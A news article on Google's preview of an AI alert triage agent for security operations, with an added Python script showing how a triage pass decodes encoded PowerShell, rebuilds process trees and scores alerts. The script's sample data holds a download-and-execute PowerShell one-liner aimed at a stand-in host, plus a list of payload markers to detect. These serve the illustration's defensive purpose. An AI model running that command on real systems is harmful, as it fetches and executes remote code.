Google Announces Public Preview of Alert Triage and Investigation Agent used in Google Security Operations


Google has announced the public preview of its Alert Triage and Investigation agent, a significant advancement in artificial intelligence-driven security operations.

The intelligent agent is now embedded directly within Google Security Operations, helping security teams process alerts faster and more effectively.

The new agent represents a significant step toward Google’s vision of an “Agentic SOC,” a security operations center powered by intelligent automation.

Instead of having security analysts check every alert by hand, the agent checks them itself, collects information, and decides whether they are real threats or harmless.

This capability allows security teams to focus their attention on alerts that genuinely require human expertise.

During private preview testing, the agent investigated hundreds of thousands of alerts across various organizations and industries.


Feedback from financial services firms and major retailers revealed substantial time savings. Google analysts reported that the agent’s comprehensive investigation summaries enabled faster decision-making while consolidating complex information that would otherwise require manual queries and analysis.

How the Agent Works

The investigation process begins when alerts are generated in Google’s detection engine. The agent reviews each alert and creates a dynamic investigation plan in line with Mandiant experts’ best practices.

It then executes multiple analytical capabilities: YARA-L searches to retrieve relevant events, threat intelligence enrichment using Google Threat Intelligence, command-line analysis for encoded or obfuscated commands, and process tree reconstruction to understand the full scope of a potential attack.

After completing its investigation, the agent decides whether the alert is real and assigns a confidence score indicating how sure it is.
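The investigation steps described above (decoding an encoded command line, reconstructing the process tree, and issuing a verdict with a confidence score) are easier to picture with a concrete walkthrough. The Python script below is an added illustration, not Google's agent code and not the Google Security Operations API; the sample process-start events, the scoring weights and the helper names are constructed assumptions chosen to show the shape of such a triage pass.

```python
import base64
import re
from typing import Dict, List, Optional, Tuple

# Constructed sample telemetry (not real data): process-start records from one
# endpoint, in the kind of shape a SIEM query for the alerted host might return.
ENCODED_PAYLOAD = base64.b64encode(
    "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/a')"
    .encode("utf-16-le")
).decode()

SAMPLE_EVENTS: List[Dict] = [
    {"pid": 100, "ppid": 1,   "name": "explorer.exe",   "cmdline": "explorer.exe"},
    {"pid": 200, "ppid": 100, "name": "WINWORD.EXE",    "cmdline": "WINWORD.EXE /n invoice.docx"},
    {"pid": 300, "ppid": 200, "name": "powershell.exe",
     "cmdline": "powershell.exe -NoP -W Hidden -EncodedCommand " + ENCODED_PAYLOAD},
    {"pid": 400, "ppid": 100, "name": "chrome.exe",     "cmdline": "chrome.exe"},
]

# PowerShell accepts several abbreviations of -EncodedCommand; longest first.
ENCODED_FLAG = re.compile(r"-(?:encodedcommand|enc|ec|e)\s+([A-Za-z0-9+/=]+)", re.IGNORECASE)

# Illustrative assumptions: which parents are unusual for a shell, and which
# decoded-payload fragments indicate download-and-execute behaviour.
OFFICE_APPS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
RISKY_PAYLOAD_MARKERS = ("downloadstring", "iex", "invoke-expression", "frombase64string")


def decode_encoded_command(cmdline: str) -> Optional[str]:
    """Return the decoded text of a PowerShell -EncodedCommand argument, or None.

    PowerShell encodes the argument as base64 over UTF-16LE, so both layers
    are reversed; malformed input yields None rather than an exception.
    """
    match = ENCODED_FLAG.search(cmdline)
    if not match:
        return None
    try:
        return base64.b64decode(match.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def ancestry(events: List[Dict], pid: int) -> List[str]:
    """Rebuild the process chain root -> ... -> pid from pid/ppid links."""
    by_pid = {e["pid"]: e for e in events}
    chain: List[str] = []
    seen = set()
    while pid in by_pid and pid not in seen:   # 'seen' guards against cyclic data
        seen.add(pid)
        chain.append(by_pid[pid]["name"])
        pid = by_pid[pid]["ppid"]
    return list(reversed(chain))


def triage(events: List[Dict], alerted_pid: int) -> Tuple[str, float, List[str]]:
    """Return (verdict, true_positive_confidence, findings) for one alerted process.

    Each finding is recorded so an analyst can see why the verdict was reached;
    the weights are constructed for this example and are not a real scoring model.
    """
    by_pid = {e["pid"]: e for e in events}
    proc = by_pid[alerted_pid]
    findings: List[str] = []
    score = 0.0

    chain = ancestry(events, alerted_pid)
    findings.append("process tree: " + " -> ".join(chain))

    parent = by_pid.get(proc["ppid"])
    if parent and parent["name"].lower() in OFFICE_APPS:
        score += 0.4
        findings.append(f"office application {parent['name']} spawned {proc['name']}")

    decoded = decode_encoded_command(proc["cmdline"])
    if decoded is not None:
        score += 0.2
        findings.append("decoded -EncodedCommand: " + decoded)
        if any(marker in decoded.lower() for marker in RISKY_PAYLOAD_MARKERS):
            score += 0.3
            findings.append("decoded command downloads and executes remote content")

    confidence = round(min(score, 0.95), 2)
    if confidence >= 0.6:
        verdict = "likely malicious"
    elif confidence >= 0.3:
        verdict = "needs analyst review"
    else:
        verdict = "likely benign"
    return verdict, confidence, findings


if __name__ == "__main__":
    for pid in (300, 400):
        verdict, confidence, findings = triage(SAMPLE_EVENTS, pid)
        print(f"pid {pid}: {verdict} (confidence {confidence})")
        for line in findings:
            print("  -", line)
```

The findings list is the part worth keeping in a real pipeline: a verdict without the decoded command and the reconstructed chain behind it gives an analyst nothing to check, which is the explainability point the article makes next.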

Google emphasizes explainability throughout the agent’s process. The system references its sources and outlines investigation steps so analysts understand how recommendations were reached.

The company uses multiple evaluation techniques, including comparisons with human experts and AI evaluation methods, to ensure accuracy and continuous improvement.

All eligible Google Security Operations Enterprise and Enterprise Plus users can opt into the public preview immediately by clicking the Gemini icon within Google Security Operations.

Investigations begin automatically after enrollment, though users can also trigger investigations manually. Google plans to bring the agent to general availability in 2026 with additional enhancements to investigation depth and workflow integration.
